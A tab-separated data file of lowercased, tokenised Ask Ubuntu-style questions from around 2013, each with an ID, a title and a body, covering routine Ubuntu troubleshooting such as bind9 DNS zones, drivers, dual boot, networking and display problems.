356737	how can i get a part of text file by terminal	how can i get some block of text by lines ? i have a log file with 6000000 lines and i want get just a block of 607366 to 700000 . i 've tried something like : head -n 607366 | tail -700000 server.log > outputfile.txt
356740	the network manager dsl tab is missing on ubuntu 13.04	i installed the ubuntu 13.04 yesterday and i wanted to connect the pc into internet . unfortunately , i could n't do so , because network manager does not have dsl tab in it . so there is 2 questions 1 ) how can i add dsl tab ? if it is possible 2 ) do i have to do it with terminal ? thank you
356743	problem after installing xorg-dev	i install xorg by the following command : ( i need x11 to work with heasoft ) sudo apt-get -y install xorg-dev after i reboot the black screen appears and is written : could not write bytes : broken pipe i ca n't proceed afterwards , and ubuntu does not start . only this black screen stays . this is the only thing i do . maybe having windows along with ubuntu has some influence ? i just installed ubuntu on part of d : disc on free space , following the instructions . giving 500mb for swap and the left free space as ext4 please help i really need ubuntu first of all for installing this software that uses x11 . i have installed ubuntu 12.03lts on windows 7 , on disc partition .
356751	how do i find out where a program has been installed ?	the first ever time i installed ubuntu was 45 minutes ago . bearing this in mind , please answer me slowly ! i 've been trying to install sublime text 2 by following these instructions . ( first method ) first , i navigated to my root directory : cd ~ and then i followed the steps detailed in the link above : sudo add-apt-repository ppa : webupd8team/sublime-text-2 sudo apt-get update sudo apt-get -- purge remove sublime-text* sudo apt-get install sublime-text i think everything 's worked properly . however , i have no idea where sublime text is installed , or how i can even run it . ( i 'm hoping i can just click on it ! )
356757	running nypl 's map-vectorizor in ubuntu - gimp scripting errors	i hope this is the right place to ask this question i recently endeavored to digitize a bunch of old maps and i aim to use nypl 's map-vectorizer tool that was written inside a mac . the aforementioned code is linked below . https : //github.com/nypl/map-vectorizer my error was after meeting all dependencies it could not open the file-load-tiff script within gimp-2.6 no matter which particular flavor of gimp ( gimp , gimp-console , gimp-console-2.6 , etc ) and it keeps giving me the same error : > thresholdizing : > -- -- -- -- -- -- -- - > test.ti/test.tif into threshold file : test.ti/test/test-threshold-tmp.tif > > ( gimp:17828 ) : glib-warning ** : ( /build/buildd/glib2.0- 2.32.3/./glib/gerror.c:390 ) : g_error_new_valist : runtime check failed : ( domain ! = 0 ) > gimp-error : execution error for procedure 'file-tiff-load ' : > could not open 'test.ti/test.tif ' for reading : no such file or directory > batch command experienced an execution error > error 4 : `test.ti/test.tif ' does not exist in the file system , > and is not recognised as a supported dataset name . > gdalinfo failed - unable to open 'test.ti/test.tif ' . now i understand everything after the gimp-error is just failscade - but i am totally new to gimp scripting and am unsure of how to ensure a stable connection between the multiple scripts that make up this tool and my gimp installation . i have tried this across two machines , my ubuntu vm sitting inside x64 windows 7 install and an arm processor chromebook running precise pangolin through crouton . update 17/10/2013 there was a typo inside the nypl-create-threshold.scm which called file-tif-load . also the invocation of gimp was missing the flags -i and -b in config.py this can be fixed by adjusting the line : defaultgimp = '/usr/bin/gimp -i -b' these two fixes have advanced me to a new error where the temporary generation of thresholdized tifs is breaking and deleting their .tmp files before allowing the rest of the script to use them . man @ squid : ~/map-vectorizer $ ./vectorize_map.py test.tif nypl labs map vectorizer v0.1 ============================= by : mauricio giraldo arteaga @ mgiraldo / @ nypl_labs gimp executable path [ /usr/bin/gimp ] : processing file : test.tif thresholdizing : -- -- -- -- -- -- -- - test.ti/test.tif into threshold file : test.ti/test/test-threshold-tmp.tif batch command experienced an execution error geodata obtained : -- -- -- -- -- -- -- -- - w -73.9968041 n 40.7219642 e -73.9955339 s 40.7205240 applying to destination : -- -- -- -- -- -- -- -- -- -- -- -- error 4 : `test.ti/test/test-threshold-tmp.tif ' does not exist in the file system , and is not recognised as a supported dataset name . gdalopen failed - 4 `test.ti/test/test-threshold-tmp.tif ' does not exist in the file system , and is not recognised as a supported dataset name . error 4 : `test.ti/test/test-wsg-tmp.tif ' does not exist in the file system , and is not recognised as a supported dataset name . polygonizing ( coarse ) : -- -- -- -- -- -- -- -- -- -- -- error 4 : `test.ti/test/test-gdal-tmp.tif ' does not exist in the file system , and is not recognised as a supported dataset name . unable to open test.ti/test/test-gdal-tmp.tif splitting megapolygon file into chunks -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- could not open shapefile edit : science fact : use the right version . updated to 2.8.6 it now works . with this dudes help http : //www.webupd8.org/2013/06/install-gimp-286-in-ubuntu-ppa.html also to be noted : precise pangolin only maintains gimp 2.6 in their repositories .
356759	how to access hdd partitions when ubuntu is intalled on a pen drive ?	i am totally newbie for ubuntu but love the whole minimalistic experience of it . so i decided to install it but because of some complications i installed it over a 4gb sandisk pendrive . now when i boot the pc with this pendrive it starts the ubuntu software but i can not access any of my hard drive partitions which are already existing other than just the pen drive space . please help me if there is a way to access all my hard drives/hdd partitions while i 'm booting ubuntu through a pen drive on my pc .
356763	setting up a uk keyboard layout	not that i have anything against my trans-atlantic cousins , but i want to change my keyboard layout from us english to uk english . i need to type ' # ' and ' ~ ' and i do n't know what position they are at in ubuntu ! # results in a \ # +shift results in a | i want to solve the problem using the gui .
356764	jerky/sticking wireless mouse on ubuntu	i have a wireless mouse made by perixx . it 's a mouse/keyboard combo that runs through a single usb radio dongle . on ubuntu , the mouse and keyboard become periodically jerky and sticky . for the mouse , that means the motion freezes and periodically as it goes across the screen . then it is smooth again . the cycle seems regular , about every 5-10 seconds or so . similar with the keyboard . i 've looked far and wide for a solution , but have found very little . there is ( this ) [ ubuntu 12.10 jerky mouse movments post , but i have know idea what properties i might change . there seem to be a mass of questions on askubuntu relating to this issue , but a paucity of answers . perhaps the problem is too particular to each device ? in any case , i 'm asking here in case anyone has any further insights . when i unplug the usb dongle and plug it back in the problem is temporarily resolved , for say 1 minute , but then it begins again . here is the relevant dmesg output : [ 71.098789 ] usb 3-4 : usb disconnect , device number 2 [ 73.514657 ] usb 3-4 : new full-speed usb device number 3 using xhci_hcd [ 73.533557 ] usb 3-4 : new usb device found , idvendor=04f2 , idproduct=0976 [ 73.533560 ] usb 3-4 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 73.533561 ] usb 3-4 : product : wireless device [ 73.533562 ] usb 3-4 : manufacturer : chicony [ 73.533699 ] usb 3-4 : ep 0x81 - rounding interval to 64 microframes , ep desc says 80 microframes [ 73.533702 ] usb 3-4 : ep 0x82 - rounding interval to 64 microframes , ep desc says 80 microframes [ 73.535143 ] input : chicony wireless device as /devices/pci0000:00/0000:00:14.0/usb3/3-4/3-4:1.0/input/input14 [ 73.535257 ] hid-generic 0003:04f2:0976.0004 : input , hidraw0 : usb hid v1.11 keyboard [ chicony wireless device ] on usb-0000:00:14.0-4/input0 [ 73.537901 ] input : chicony wireless device as /devices/pci0000:00/0000:00:14.0/usb3/3-4/3-4:1.1/input/input15 [ 73.537968 ] hid-generic 0003:04f2:0976.0005 : input , hiddev0 , hidraw1 : usb hid v1.11 device [ chicony wireless device ] on usb-0000:00:14.0-4/input1 [ 73.539080 ] input : chicony wireless device as /devices/pci0000:00/0000:00:14.0/usb3/3-4/3-4:1.2/input/input16 [ 73.539341 ] hid-generic 0003:04f2:0976.0006 : input , hidraw2 : usb hid v1.11 mouse [ chicony wireless device ] on usb-0000:00:14.0-4/input2
356766	improve battery life by freezing ( unload from cpu & memory ) unused programs	i 'm using ubuntu 12.04 + gnome 3.6 on a laptop , a lot of times i would have 12+ windows spreaded amoung five or six workspaces . however most of the times i would just use a few programs located on one or two workspaces at a time . i am wondering if there are ways to unload the temporarily unused programs from cpu ( if possible the memory ) but still keep the windows open at its previous state ? ( it 's a pain to set up multiple terminals sometimes ) . the main objective for this is to save battery on my laptop .
356771	i could not use gnome or xwindows so unity was tried and `` display variable set '' may need resetting .	i can not boot to a xwindows screen so i am trying unity . here is what i get after : sudo apt-get install unity my toshiba satellite says to that : `` unity is already the newest verstion '' ok , so let 's try : unity my machine says : warning no display variable set , setting it to :0 compiz ( core ) - fatal : could n't open display : 0 unity-panel-service : no process found does this explain why gnome and xwindows do n't work as well ? is there a way for me to fix my `` display variable set '' and will that solve my problem ? thank you , ken
356772	using `dpkg -- set-selections` to copy package config to a new server	i 'm trying to create a test server with all the same packages on as the live server , following the instructions here ( and similar instructions elsewhere ) but when i run the apt-get -u dselect-upgrade command i 'm getting : reading package lists ... done building dependency tree reading state information ... done the following packages have unmet dependencies : cron : depends : adduser but it is not going to be installed upstart : depends : initscripts depends : mountall depends : ifupdown ( > = 0.6.10ubuntu5 ) e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : internal error , problem resolver broke stuff both servers are in the rackspace cloud , but under different accounts , so i ca n't use rackspace 's clone features .
356776	is the linux kernel required to run linux ?	at the risk of sounding like a complete dumb : is the linux kernel required to run linux ? i ask because i 'm brand spanking new to the linux scene and google does n't help with this question .
356779	redirect facebook visit to another webpage	i 'm looking for a way to redirect visits to facebook to another website . it 's to stop a child from wasting all his time on facebook . we ca n't use extensions because they are simple to disable so i 'm looking for something along the lines of the hosts file from windows which redirects all visits to a ip to another ip . i know of iptables but i ca n't quite figure out how to redirect all visits to facebook to another webpage . i 'm using ubuntu 13.04 .
356784	ubuntu apache2 external access issue	installed lamp via tasksel everything is default ok so i have port forwarded external port 65000 to internal port 80 pointing to my vm 192.168.xx.xx so dynamicip:65000 -- > 192.168.xx.xx:80 internally apache works by 192.168.xx . this shows the it works page . i can access it from other machines on the lan too . however externally i get nothing . i confirm the dynamic dns is pointing to the correct place . there is no firewall , ufw is off , there are no iptable rules . i have listen set to port 80 i have namevirtualhost *:80 listen 80 i 've googled for anything i can try and no luck . even took the setup home and cloned the vm and setup my own port forward and still no luck ive been trying to figure this out for hours with no luck , please what am i missing ? thanks in advance
356785	installing ubuntu 13.04 problem with formatting drive	i am trying to install 13.04 on a 60 gb ssd , connected via sata to a lsi 2008 8 port sas controller on an supermicro mbd-h8dg6-f-0 motherboard . the install took an extremely long time ( ~ an hour ) on the creating ext4 file system for /home in partition # 1 of lvm vg ubuntu-vg , lv home ... step . if i look in the console , there is a set of messages that repeat : sd 4:0:0:0 : [ sdb ] cdb : write same ( 16 ) : 93 0b 00 00 00 00 06 0e cf e2 00 00 ff ff 00 00 scsi target4:0:0 : handle ( 0x0009 ) , sas_address ( 0x44332211000000000 ) , phy ( 0 ) scsi target4:0:0 : enclousre_logical_id ( 0x500304b00be72000 ) , slot ( 0 ) sd 4:0:0:0 : task abort : sucess scmd ( ffffbb3fde47dd00 ) finally , it fails to create a mountable /boot , and the install hangs . i have removed the timestamps , because i am copying this by hand off one monitor and typing it in ( similarly there may be errors in the addresses ) . what could be going wrong ? should i just continue to let this go ? i saw some recommendations to upgrade the firmware for my sas controller on similar messages , but i ca n't do that without an os ( that i know of ) .
356786	troubleshooting a non-charging battery on laptop	i 'm running ubuntu 13.04 on a dell xps 13 . my laptop works when plugged in but the battery does n't charge . the battery info says it has a 0 w rate . what steps can i take to debug this , and potentially fix it ?
356787	how to install libba53 package ?	i am using ubuntu 12.04 on dell inspiron . i want to install a software for which i need libba53 package . the following command was given for this but it did not work : cd a53/trunk sudo make install it 's output is like this : $ cd a53/trunk bash : cd : a53/trunk : no such file or directory $ sudo make install [ sudo ] password for usama : make : *** no rule to make target `install ' . stop . what should i do now ? how should i fix this problem ?
356789	i ca n't change permission on arnet	root @ vitor-hp-g42-notebook-pc : ~ # chmod 777 /media/arnet/ chmod : alterando permissões de “/media/arnet/” : sistema de arquivos somente para leitura root @ vitor-hp-g42-notebook-pc : ~ # ls -l /media/arnet/ total 167 dr-x -- -- -- 1 vitor vitor 2048 fev 10 2012 arnet -r -- -- -- -- 1 vitor vitor 148320 mar 16 2011 autorun.exe -r -- -- -- -- 1 vitor vitor 45 out 18 2008 autorun.inf -r -- -- -- -- 1 vitor vitor 94 jan 13 2011 autorun.sh -r -- -- -- -- 1 vitor vitor 4747 jan 13 2011 install_linux dr-x -- -- -- 1 vitor vitor 2048 fev 10 2012 linux -r -- -- -- -- 1 vitor vitor 9662 fev 6 2012 startup.ico -r -- -- -- -- 1 vitor vitor 1553 fev 6 2012 sysconfig.dat i ca n't change permission on my ubuntu 12.04 . when i use chmod 777 /media/arnet/ after appear as i did n't change nothing . the readme is -- how to install -- -- -- -- -- -- -- -- -- -- -- * you need login as root * run `` tar jxvf linux_install.tar.bz2 '' run `` ./install '' in terminal to install mobilepartner eg : # bash //install if you had installed this software in your system before , you will get a prompt : `` the software is exist , do you want overwrites ? ( [ y ] / [ n ] ) '' , enter `` y '' to overwrites or `` n '' to exit . if you do not had installed this software in your system before , you will get a prompt : `` please input the install path [ /usr/local/mobile_partner ] : '' . then you can input install path ( fullpath ) , or you may using the default path ( /usr/local/mobile_partner ) by press enter direct finish installing -- how to run -- -- -- -- -- -- -- -- -- -- -- -- -- * from shortcut in desktop run mobilepartner in your install path eg : # //mobilepartner plug in your device , it will run automatically ( not supported in xandros ) and now ?
356791	what is the linux 3.8.0-xx all about ?	so to keep it simple , my hardware was n't working on 13.04 so i advanced booted with linux 3.8.0-19 rather than 3.8.0-31 and like magic it all worked . so why is this ? can i always boot with this linux version/kernel/whatever ? can i update ubuntu like normal ?
356792	recover lost partiton table	wanted to add 100 mb music file to my external drive which i am using as a backup drive for important data . when the transfer was over i hit the safe remove option . then new dialog appears saying the data is still writing and it will have to wait for a while . that was no prob for me but i disconnected ext drive only when this new dialog took bigger amount of time then the initial transfer saying to my self the hell with this last music file if it take so long . now i know . it was a mistake . my ext drive consist of two partitions : sdb1 labeled elements flow and sdb2 labeled new volume fdisk -l output looks like this : disk /dev/sdb : 500.1 gb , 500074283008 bytes 255 heads , 63 sectors/track , 60797 cylinders , total 976707584 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0004a183 device boot start end blocks id system /dev/sdb1 * 2048 347557887 173777920 7 hpfs/ntfs/exfat /dev/sdb2 347557888 976703487 314572800 7 hpfs/ntfs/exfat in my computer i can see both partitions but on sdb2 there are no visual files although when i hit properties there is 201 gb used and 121 gb still free . with testdisks quick search i found sdb1 and sdb2 partiton tables and re-write the second ( lost ) one and after restart there still are no visual files . i tried deeper searh which took about 12 hours . disk /dev/sdb - 500 gb / 465 gib - chs 60798 255 63 partition start end size in sectors > d hpfs - ntfs 0 32 33 21634 121 55 347555840 [ elements flow ] d hpfs - ntfs 0 32 33 60797 59 62 976705536 [ elements flow ] d hpfs - ntfs 21634 121 56 60796 249 61 629145600 [ new volume ] after list files i managed to copy out 100gb of data as a panic attack move but i would like to adjust the partition tables so my `` missing folders '' appear . i 'm running : no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise can anyone help ?
356793	zte ac2738 reliance netconnect is not able to connect	my zte reliance netconnect modem is not working.i 've tried each possibility which is given on different forums , bt still unable to connect it.i 've tried lsusb command , it shows my modem in list , also sometimes it get connected but when i restart my laptop agin same problem occurs.i 've tried connecting my brothers netconnect , it is been detected in network manager as well as wvdial.but my modem is not working
356794	the medibuntu project has come to an end - what do i do now ?	the medibuntu project has come to an end : what do i do now ? how do i find packages on my system which came from medibuntu ? the previous question seems to list medibuntu packages explicitly - is there a way to query the package database by the source ? do i need to remove them so that they are replace by maintained packages from other sources ? which repository contains those packages now ?
356795	13.04 64-bit install not enough disk space	i installed 13.04 64-bit in vmware player and during the update process the system runs out of disk . i installed from an iso image , i did not enter any disk sizes or similar , everything was done automatically . how can i make the boot partition bigger ? i am happy to reinstall if that 's necessary . current output from df is : filesystem 1k-blocks used available use % mounted on /dev/sda1 4061888 3768088 84136 98 % / none 4 0 4 0 % /sys/fs/cgroup udev 8204812 4 8204808 1 % /dev tmpfs 1642872 776 1642096 1 % /run none 5120 0 5120 0 % /run/lock none 8214352 152 8214200 1 % /run/shm none 102400 24 102376 1 % /run/user
356796	wireless internet problem	i 've recently installed ubuntu on a partition alongside windows 7 . when i 'm on ubuntu and i connect to my college 's wireless internet , there are problems . sometimes it will connect and be fine for a few minutes . however , more often it just tries to connect for a while before failing . i 'm not having problems when on my own wireless internet at home , our college wifi requires you to sign in with a username and password on a web browser which i am able to do . i 'm not sure if this is the problem . i 'm running my windows 7 now and it is staying connected to the college wifi without a problem . i also used to run ubuntu on a virtual machine and never had any issues with it before , not sure if that helps . i searched around and tried things such as : http : //www.hitxp.com/articles/software/ubuntu-fix-slow-wireless-internet-connection-speed-upgrading-11-04-natty-narwhal/ any help appreciated , sorry if i 've left out something important . adam .
356800	how to completely restart script from inside the script itself	i 'm setting up a shell script with menues and sub menues , options , etc . but on each menu/submenu/etc , i need a `` go back to main menu '' choice . i 've already got the menu set up and it works fine , but i need a way to simply restart the script from scratch , reset all variables etc etc . or a way to exit the current script and starting it again . i 've tried to do this : scriptloc= $ ( readlink -f `` $ 0 '' ) ./scriptloc but that starts the `` new '' script inside the `` old '' script , so when i exit the `` new '' script , it goes back to the `` old '' script ( if that makes any sense ) . it 's a script inside a script kind of thing . anyone got an idea how to restart it completely ?
356802	how do i share photos over ubuntu one ?	i have joined ubuntu one . for the life of me , i can not figure out how to add pictures to the cloud . i did notice a ubuntu one folder in my home directory . i then pasted in another directory from elsewhere that had 8 photos in it . however , i ca n't seem to share it . i said that i wanted to , and gave the email addresses of 2 people , who also subsequently joined ubuntu one . however , the folder is empty for others . what can i do to let my friends see the images that are in a folder within the ubuntu one folder in my home directory . [ i presume this how it works , in light of no other instructions on how to actually use this service ] .
356804	asus q301l - no sound in ubuntu 13.04 x86	i just bought a nifty laptop and immediate ditched windows 8 in favor of ubuntu . everthing works perfectly , even the touchscreen . all with the exception of sound . ubuntu shows my sound as detected but i hear nothing . i can plug external speakers into the headphone jacks and i hear sound just fine . unplug , nothing . i 'm a complete n00b with ubuntu . : ( i followed some directions on other forums for somewhat similar asus laptops with sonicmaster sound . they had be rip out pulse audio and that did n't help . i removed and reinstalled alsa and pulse audio and the sound indicator application ( for the sound icon at the top of the screen ) . now the test buttons in the sound application do not seem to work , but i do get sound through external speakers . just not the internal speakers . lost ! help ! thanks ! : d
356805	ubuntu desktop freezes	i tried to find something about this error , but nothing found . maybe it 's too simple . i did n't worked so much with ubuntu and have installed a ubuntu version the first time . download , burn on disc , reboot , install . but if the system loads the ubuntu-desktop it stucks . i can move the mouse , ca n't click anything . i was surprised while after a entered powersave , the desktop refreshes with the clicks i have done . but it stucks again . also i can access ther terminal with ctrl + alt + f1 but i 've no great idea what i can do in this case ... : s the ubuntu version is 13.04-desktop-amd64 if it helps , got an amd x6 and a radeon hd7800 , but i think this should be more than enough power : x : ) thanks for help
356807	port forwarding through shared internet connection	i have shared my internet connection via ethernet with another computer , using the shared option under ethernet in network settings . i believe this is working but i ca n't know for sure as i am unable to access computer 2 , because i do n't have a monitor for it . router ‒‒‒‒‒‒‒‒‒‒ > computer 1 ( ubuntu ) ‒‒‒‒‒‒‒‒‒‒ > computer 2 ( other linux ) so the first question is : how do i find out the ip of computer 2 so i can ssh to it from computer 1 . and : how can i forward a port right through from my router to the machine using the shared connection ( computer 2 ) .
356809	nvidia video driver does n't load at boot ( ubuntu 13.04 )	i have a problem with my ubuntu desktop 13.04 x64 i installed nvidia drivers 304 ( nvidia-current ) both from terminal , and then , after a purge , from system settings . no luck at all . when i start up my pc , the login and the boot up is showed up as a plain text , then , suddently after 5-6 minutes , the video starts up and everything work as intended . ( is not due to slow pc , cause is an ssd - intel core i3 ) why is this happening and how to fix it ?
356813	dns configuration problem bind9	following is my bind9 configuration the domain i want to configure is home.lan it is home network /etc/bind/named.conf.local is following zone `` home.lan '' in { type master ; file `` /etc/bind/zones/home.lan.db '' ; } ; zone `` 1.168.192.in-addr.arpa '' { type master ; file `` /etc/bind/zones/rev.1.168.192.in-addr.arpa '' ; } ; /etc/bind/named.conf.options is following options { directory `` /var/cache/bind '' ; // if there is a firewall between you and nameservers you want // to talk to , you may need to fix the firewall to allow multiple // ports to talk . see http : //www.kb.cert.org/vuls/id/800113 // if your isp provided one or more ip addresses for stable // nameservers , you probably want to use them as forwarders . // uncomment the following block , and insert the addresses replacing // the all-0 's placeholder . // forwarders { // 0.0.0.0 ; // } ; //======================================================================== // if bind logs error messages about the root key being expired , // you will need to update your keys . see https : //www.isc.org/bind-keys //======================================================================== dnssec-validation auto ; auth-nxdomain no ; # conform to rfc1035 listen-on-v6 { any ; } ; } ; since it is a personal network i do not need any forwarders section , so did not configured it . /etc/bind/zones/home.lan.db ; use semicolons to add comments . ; host-to-ip address dns pointers for home.lan ; note : the extra â.â at the end of the domain names are important . ; the following parameters set when dns records will expire , etc . ; importantly , the serial number must always be iterated upward to prevent ; undesirable consequences . a good format to use is yyyymmddii where ; the ii index is in case you make more that one change in the same day . $ origin . $ ttl 86400 ; 1 day home.lan . in soa ubuntu.home.lan . hostmaster.home.lan . kalu.home.lan . ( 2008080901 ; serial 8h ; refresh 4h ; retry 4w ; expire 1d ; minimum ) ; ns indicates that ubuntu is the name server on home.lan ; mx indicates that ubuntu is ( also ) the mail server on home.lan home.lan . in ns kalu.home.lan . home.lan . in mx 10 ubuntu.home.lan . $ origin home.lan . ; set the address for localhost.home.lan localhost in a 127.0.0.1 ; set the hostnames in alphabetical order home in a 192.168.1.7 ntinstall in a 192.168.1.7 kalu in a 192.168.1.7 router in a 192.168.1.1 server in a 192.168.1.5 and /etc/bind/zones/rev.1.168.192.in-addr.arpa ; ip address-to-host dns pointers for the 192.168.1 subnet @ in soa ubuntu.home.lan . hostmaster.home.lan . ( 2008080901 ; serial 8h ; refresh 4h ; retry 4w ; expire 1d ; minimum ) ; define the authoritative name server in ns ubuntu.home.lan . ; our hosts , in numeric order 1 in ptr router.home.lan . 2 in ptr ubuntu.home.lan . 3 in ptr ntinstall.home.lan . 4 in ptr kalu.home.lan . and /etc/hostnames kalu and /etc/resolv.conf on bind9 server is # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search home.lan at the client machine /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 nameserver 192.168.1.7 search home.lan and from client machine when i try to ping i get $ ping kalu.home.lan ping : unknown host kalu.home.lan there is no file like /var/log/bind.log so not sure where to look for here is dig output at server dig kalu.home.lan ; < < > > dig 9.8.1-p1 < < > > kalu.home.lan ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : servfail , id : 36937 ; ; flags : qr rd ra ; query : 1 , answer : 0 , authority : 0 , additional : 0 ; ; question section : ; kalu.home.lan . in a ; ; query time : 0 msec ; ; server : 127.0.0.1 # 53 ( 127.0.0.1 ) ; ; when : fri oct 11 23:59:03 2013 ; ; msg size rcvd : 31 and at the client machine dig kalu.home.lan gives following dig kalu.home.lan ; < < > > dig 9.8.1-p1 < < > > kalu.home.lan ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : nxdomain , id : 25537 ; ; flags : qr rd ra ; query : 1 , answer : 0 , authority : 1 , additional : 0 ; ; question section : ; kalu.home.lan . in a ; ; authority section : . 7388 in soa a.root-servers.net . nstld.verisign-grs.com . 2013101101 1800 900 604800 86400 ; ; query time : 43 msec ; ; server : 127.0.0.1 # 53 ( 127.0.0.1 ) ; ; when : fri oct 11 23:59:34 2013 ; ; msg size rcvd : 106 what is the mistake in above dns configuration ? kalu is the hostname of machine on which i am configuring all this . to enable loggin in bind 9 rndc querylog it shows oct 12 01:42:16 ubuntu named [ 11408 ] : dns_rdata_fromtext : /etc/bind/zones/home.lan.db:11 : near 'kalu.home.lan . ' : not a valid number oct 12 01:42:16 ubuntu named [ 11408 ] : zone home.lan/in : loading from master file /etc/bind/zones/home.lan.db failed : not a valid number oct 12 01:42:16 ubuntu named [ 11408 ] : zone home.lan/in : not loaded due to errors . oct 12 01:42:16 ubuntu named [ 11408 ] : zone localhost/in : loaded serial 2 oct 12 01:42:16 ubuntu named [ 11408 ] : managed-keys-zone ./in : loaded serial 5 and i see sudo named-checkzone home.lan home.lan.db [ sudo ] password for hp : zone home.lan/in : loading from master file home.lan.db failed : file not found zone home.lan/in : not loaded due to errors .
356814	wireless connection at & t	i am a newbie but learning fast . i have ubuntu 12.04 installed on a acer one laptop which is certified compatible by canonical . after installing ubuntu , i switched my isp from at & t dsl to at & t uverse . the ubuntu os had no problems with the old dsl but will not connect to uverse . the wireless works flawlessly everywhere else : office , school , book store , coffee shop , etc , but not at home with the uverse wireless . it still works plugged into the ethernet . the uverse wireless works with all other laptops and devises since they are either apple or windows . needless to say , at & t offers no help , since after the fact , they blow you off with the statement that they do n't support linux distros . the uverse gateway is the 2-wire 3600hgv which is modem , router , and wireless all in one . the ubuntu connection sees the uverse wireless , tries to connect , and seems to cycle connecting and disconnecting immediately . i have checked all of the simple solutions : everything is right . thank you for your help .
356823	how does display manager know which wm/de to run ?	i switched to arch for a while and got very used to booting to the terminal , logging in , and running `` startx '' to start my wm . i , of course , could change which wm or de to run in the ~/.xinitrc file . now i am back to ubuntu and am wondering how using a display manager handles this . when the display manager begins , it runs x . then the user is given options of which wm or de they wish to run . so when the display manager starts , does it simply run `` startx '' ? after that , what configuration in what file gets changed when the user selects the wm/de they want to run ? basically i just want to know the steps that take place from the display manager starting to the wm/de beginning . i know this is n't ubuntu-specific , but since i am back on ubuntu , i figured i could just ask here .
356824	windows is not booting any more after resizing `` / ''	on my machine i have two ubuntu partitions and one windows partition . everything was fine , until i had to increase the size of the / partition of one of the ubuntu installs . i basically moved the / from /dev/sda8 to /dev/sda10 ( there 's a guide on ubuntu wiki about how to do that ) . everything went fine , except that i lost the ability of booting on windows . there 's still the windows entry in grub , but whenever i click on it , i 'm sent back to the grub window . any help ? here 's the output of `` bootinfoscript '' ( unfortunately , i 'm not understanding it that much ) - > http : //pastebin.com/wnwvsxn5 thanks in advance for any help ! : )
356825	make compiling error 'no rule to make target ' when trying to install a driver	when i try to install a driver via sudo make i get these errors : make -c /lib/modules/3.8.0-31-generic/build m= make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-31-generic' make [ 2 ] : *** no rule to make target `/usr/src/linux-headers-3.8.0-31-generic/arch/x86/syscalls/syscall_32.tbl ' , needed by `arch/x86/syscalls/../include/generated/uapi/asm/unistd_32.h ' . stop . make [ 1 ] : *** [ archheaders ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-31-generic' make : *** [ all ] error 2 here is the make file : ifndef kerneldir kerneldir : = /lib/modules/ $ ( shell uname -r ) /build endif obj-m : = ueagle-atm.o obj-m += usbatm.o all : $ ( make ) -c $ ( kerneldir ) m= $ ( pwd ) debug : $ ( make ) -c $ ( kerneldir ) m= $ ( pwd ) extra_cflags= '' -ddebug '' clean : $ ( make ) -c $ ( kerneldir ) m= $ ( pwd ) clean install : $ ( make ) -c $ ( kerneldir ) m= $ ( pwd ) modules_install /sbin/depmod -ae
356826	delete the read permission from a file	so , let 's say i have a file named file . whenever someone wants to edit or read it ( for example cat file in terminal ) , it should ask for root password . how to do this ? i suppose there 's a chmod command , but i ca n't figure out , even on the internet .
356827	help me ! ! ! ! profit is going down	i have a game on ubuntu software center . it costs 5 $ . but i only get 4 $ . ok . but , when my 2nd buyer bought , instead of having 8 $ , i had 7.20 $ . now , i got a third buyer and i have 10.40 $ instaed of 12 $ . why ? ? ? ?
356835	i 've installed dual boot , windows 8 and ubuntu , how i can select to boot win8 on boot ?	well , now every time i boot my pc , its run ubuntu , and i need to press f8 to select windows 8 , the problem is its not only who use this pc , and i need to windows 8 run without pressing any key or selecting it . its possible ? thank you , sorry for my bad english , i 'm latin and 16 old .
356839	switch desktop environment from command line	i have ubuntu gnome installed on a headless box . i use ssh or vnc to connect to it . i 'm trying to switch to xfce and i 've got it installed , but the tutorials say to log out , and select the desktop environment from the login screen . problem is , over vnc i ca n't do this . how do i set the default desktop environment from the command line or a config file ?
356842	ubuntu default terminal missing on 13.04	there was a problem with my unity on ubuntu 13.04 install in which i could not see any icons after logging in . just a blank screen . used ccsm to purge unity , reinstalled it and reset the settings after which it worked fine . after these steps i noticed that the default terminal icon is missing from the dash home search . ctrl+alt+t key sequence also does not open the terminal ( even though this keyboard shortcut is already in place ) . i 've reset unity and compiz and restarted my system , but the issue still persists . ca n't seem to find any solution in the forums . can someone please help ? its annoying to use xterm instead of the default terminal .
356848	touchpad multi-tap buttons not configured correctly on 12.04 lts	i 'm running ubuntu 12.04 on an acer c7 chromebook with chrubuntu . overall , it works very well , but there is one minor problem . i would like one finger for left click , and two for right click . i can achieve this easily with the following commands synclient tapbutton1=1 synclient tapbutton2=3 synclient tapbutton3=2 however , after reboot ( or closing/opening the lid ) , when i query synclient , the settings are as follows : tapbutton1 = 3 tapbutton2 = 1 tapbutton3 = 0 this is an odd and undesirable three-finger left click ! this persists , even though i have added the following lines to /usr/share/x11/xorg.conf.d/10-synaptics.conf option `` tapbutton1 '' `` 1 '' option `` tapbutton2 '' `` 3 '' option `` tapbutton3 '' `` 2 '' i 've tried adding the synclient commands to correctly configure the touchpad to /etc/rc.local , but it still starts up incorrectly . the only workaround is a script that sets up the touchpad correctly , which i run everytime i re-open the lid . it works , but not the most elegant fix for an otherwise excellent system any idea how i can make the touchpad configured correctly at startup , or re-opening the lid ? thanks
356853	when i connect to a wifi , no one else connect	i have ubuntu 12.04 on a lenovo thinkpad . when i connect to a wifi , it immediatly destroys any other connection and ony i got the wifi . when i quit , anyone can join.. i am very surprised but this happens on most of the wifi hotspots .
